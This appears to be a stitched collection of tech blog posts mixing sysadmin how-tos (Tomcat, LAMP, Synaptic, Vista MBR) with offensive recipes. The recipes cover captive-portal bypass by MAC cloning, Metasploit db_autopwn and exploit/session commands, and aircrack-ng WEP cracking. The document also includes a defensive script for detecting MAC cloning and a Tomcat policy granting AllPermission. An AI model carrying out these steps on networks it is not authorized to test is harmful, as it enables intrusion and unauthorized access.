Bypass URL Redirects with MAC Spoofing
It's not difficult to bypass a URL redirect by spoofing the MAC address of an authorized computer. All you need is a laptop and Wireshark.
Here are the steps:
- Boot to Linux and verify that your eth0 connection is enabled and connected to the network. You can check this by running: ifconfig
- Next run wireshark
- Click on the Start Capture button and then select the configuration button for your eth0 device
- Create a filter that only captures Ethernet ARP packets
- Start the capture
- Wait until another computer connects to the network (it may take some time before an authorized machine shows up)
- When it communicates with the server, an ARP packet will be sent containing that computer's MAC address
- Record the MAC address and stop the capture
- Open a terminal
- Type: macchanger --mac <copy the new MAC address here> eth0
- Check that your MAC address is now the same as the other computer: ifconfig
- Type: /etc/init.d/networking stop
- Type: /etc/init.d/networking start
- Open a browser and verify that you now bypass the URL redirect and can browse the internet
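The portal described above authorizes clients by MAC address alone, so the network side sees nothing unusual unless it watches the ARP traffic itself. The following script is an added example (not part of the original post) showing the two signatures a cloned MAC leaves in ARP: one hardware address speaking for two different IP addresses, and a known IP that starts answering from a new hardware address. The one-line-per-packet record format ("timestamp MAC IP") and the sample observations are constructed for this example; a real capture, such as the Wireshark ARP filter from the post exported as text, would need to be mapped onto it.

```python
"""Flag MAC-address cloning from ARP observations (added example, not from the post).

Record format (constructed for this example): one ARP packet per line,
    <timestamp> <sender MAC> <sender IP>
"""
from collections import defaultdict

# Constructed sample ARP observations; not captured from a real network.
# 00:11:22:33:44:55 is later seen claiming a second IP (a clone), and
# 192.168.1.31 moves from one MAC to another.
SAMPLE_ARP = """\
10:00:01 00:11:22:33:44:55 192.168.1.20
10:00:05 aa:bb:cc:dd:ee:01 192.168.1.31
10:00:09 00:11:22:33:44:55 192.168.1.20
10:02:40 00:11:22:33:44:55 192.168.1.77
10:02:41 aa:bb:cc:dd:ee:01 192.168.1.31
10:03:10 de:ad:be:ef:00:01 192.168.1.31
"""


def parse_arp(text):
    """Return a list of (timestamp, mac, ip) tuples, skipping blank or malformed lines."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        ts, mac, ip = parts
        records.append((ts, mac.lower(), ip))
    return records


def macs_with_multiple_ips(records):
    """Map each MAC seen with more than one sender IP to the sorted list of those IPs.

    A host normally keeps one IP for the life of its DHCP lease, so a single
    hardware address claiming two addresses is the classic sign of two
    machines sharing one MAC.
    """
    ips_by_mac = defaultdict(set)
    for _, mac, ip in records:
        ips_by_mac[mac].add(ip)
    return {mac: sorted(ips) for mac, ips in ips_by_mac.items() if len(ips) > 1}


def ips_that_changed_mac(records):
    """Map each IP seen behind more than one MAC to the MACs in order of first appearance."""
    macs_by_ip = defaultdict(list)
    for _, mac, ip in records:
        seen = macs_by_ip[ip]
        if mac not in seen:
            seen.append(mac)
    return {ip: macs for ip, macs in macs_by_ip.items() if len(macs) > 1}


def report(text):
    """Return human-readable alert lines for both conditions (empty list if clean)."""
    records = parse_arp(text)
    alerts = []
    for mac, ips in sorted(macs_with_multiple_ips(records).items()):
        alerts.append(f"MAC {mac} seen with multiple IPs: {', '.join(ips)}")
    for ip, macs in sorted(ips_that_changed_mac(records).items()):
        alerts.append(f"IP {ip} changed MAC: {' -> '.join(macs)}")
    return alerts


if __name__ == "__main__":
    for line in report(SAMPLE_ARP):
        print(line)
```

Both checks are cheap enough to run continuously on the portal's own ARP table or on a mirrored port. The underlying weakness, though, is keying authorization on a MAC address at all; a per-user credential (for example 802.1X or a session cookie bound to the authenticated login) does not survive cloning the way a MAC allow-list does.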
Metasploit db_autopwn
./msfconsole
db_create test
db_hosts
db_nmap IP ADDRESS TO TEST -p PORT
db_hosts
db_autopwn -t -p -e -s -b
sessions -l
sessions -i <session id>
Restore VISTA MBR (if the traditional methods are failing)
- Download and install EasyBCD
- Click on the Manage Bootloader button
- Make sure "Reinstall the Vista Bootloader" is selected
- Hit the "Write MBR" button
- Restart your machine
Your Vista Bootloader should be restored.
Synaptic not showing all packages
On a fresh VMware install of Ubuntu 8.10 I ran into the problem where additional packages weren't showing up in the Synaptic Package Manager. I've seen this before and have previously been able to resolve it. Once and for all I'm going to blog the fix so I can find it for future reference.
- Open up a terminal
- Enter the command: sudo update-apt-xapian-index
- Restart Synaptic Package Manager when the update is complete
- You may need to reload the package information by pressing Ctrl-R
- It should work fine now
Hope this can help other people annoyed by this problem.
Setup a Tomcat server in Ubuntu
Install the required packages (either using "apt-get install" in the terminal or from the package manager), then follow the instructions to configure it:
- tomcat5.5
- tomcat5.5-admin
- tomcat5.5-webapps
- sun-java6-jdk
Tomcat needs to know where the jdk is.
Open /etc/default/tomcat5.5 in a text editor.
Change the line that starts:
#JAVA_HOME.
to read:
JAVA_HOME=/usr/lib/jvm/java-6-sun
** This assumes that you have java 6 installed. Check that you have that folder.
Update the tomcat security policy:
sudo gedit /etc/tomcat5.5/policy.d/03catalina.policy
At the very end of the file, add the lines:
grant {
// java.security.AllPermission is the correct class name (there is no java.net.AllPermission).
// It already covers the SocketPermission below; to keep the sandbox, grant only the SocketPermission.
permission java.security.AllPermission;
permission java.net.SocketPermission "localhost:3306", "connect";
};
Next you need to import the MySQL JDBC driver (.jar) into Tomcat. Go to http://dev.mysql.com/downloads/connector/j/5.1.html and download the tar file. When it asks whether you have registered, look below for the link that says 'No Thanks'. Double-click the downloaded tar file to extract it, go into the newly created folder and run:
sudo cp mysql-connector-java-5.1.5-bin.jar /usr/share/tomcat5.5/server/lib/
This copies the driver jar into Tomcat's server library directory so your JSPs and servlets can load it.
Restart your tomcat server:
sudo /etc/init.d/tomcat5.5 restart
Setup LAMP in Ubuntu
1. Install Apache2
- Start the package manager by going to the menu: "System>Administration>Synaptic Package Manager"
- Enter your password to allow the program to run.
- Search for the package named "apache2" by clicking the search button on the menu bar.
- Find the package named exactly "apache2"
- Click the check box next to the package and choose "Mark for installation" from the pop up menu.
- A window will appear asking if additional changes should be made. These are other packages that apache2 requires to function properly. Choose the button that says "Mark".
- Apply the changes by clicking the "Apply" button from the menu
- Note: You can select as many packages as you want before applying changes. For example you could install Apache2 at the same time as you install MySQL.
2. Install MySQL and PHP
Search for and install these packages from the package manager:
- php5-mysql
- mysql-server
- mysql-client
- phpmyadmin (installer will ask what server to connect to. Choose apache2.)
- libapache2-mod-auth-mysql
3. Configure phpmyadmin
To set up phpmyadmin under Apache, all you need to do is include one line in /etc/apache2/apache2.conf. First, open the file with the following command:
sudo gedit /etc/apache2/apache2.conf
Add the following line of code inside apache2.conf:
Include /etc/phpmyadmin/apache.conf
Now restart Apache:
sudo /etc/init.d/apache2 restart
4. Test it out...
Open up a browser and type "http://127.0.1.1/" into the address bar. If a page comes up that says "It works!" your Apache server is running and configured. Now point to "http://127.0.1.1/phpmyadmin" and verify that the phpmyadmin page comes up.
Cracking WEP
I've looked at several different methods for cracking WEP... this is what worked for me:
Because my onboard wireless NIC does not support packet injection, I used my wireless USB adapter to do this in BackTrack 4.
Setup your adapter:
Code:
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
Start up Kismet from the command line and start collecting information (look for the WEP network you want to crack and record the channel, BSSID, and ESSID):
Code:
kismet
Open a new terminal session. Plug the values you collected from kismet into the command below (you may want to create and change into a temporary directory first, because this creates several files that are dumped into the present working directory):
Code:
airodump-ng -c (channel) -w (filename) --bssid (BSSID) wlan0 --ivs
Next you'll want to create another terminal session and begin authentication with the router:
Code:
aireplay-ng -1 0 -e (ESSID) -a (BSSID) -h 00:11:22:33:44:55 wlan0
At this point open another terminal and begin packet injection (this should bump up your packet collection significantly):
Code:
aireplay-ng -3 -b (BSSID) -h 00:11:22:33:44:55 wlan0
The final step to the crack is simple. Point aircrack-ng to the .ivs file that airodump-ng created. It will process until there are enough packets collected and then give you the WEP key.
Code:
aircrack-ng -s /wep_router.ivs
This should do it... I'll tweak this as I go to make it better. Feel free to give feedback if you have suggestions or changes.
BT4 and rausb0 (the driver I used in BT3)
After much trial, I finally figured out how to configure my USB wireless adapter that utilized the rausb0 driver in BackTrack 3. Since moving over to BackTrack 4 I haven't been able to use my external USB adapter.
Below is the command I was using with the resulting error:
rausb0: ERROR while getting interface flags: No such device
I finally figured out that they have updated the driver for my Hawking device to use the wlan0 driver instead. I'm not sure how this works for other devices but it fixed my problem. New command:
root@bt:~#
Success!
Metasploit Quick Tutorial
>: /pentest/exploits/framework3
>: ./msfconsole
msf > use exploit/...
msf > set PAYLOAD ...
msf > set RHOST ...
msf > set RPORT ...
msf > set LHOST ...
msf > set LPORT ...
msf > exploit
BAM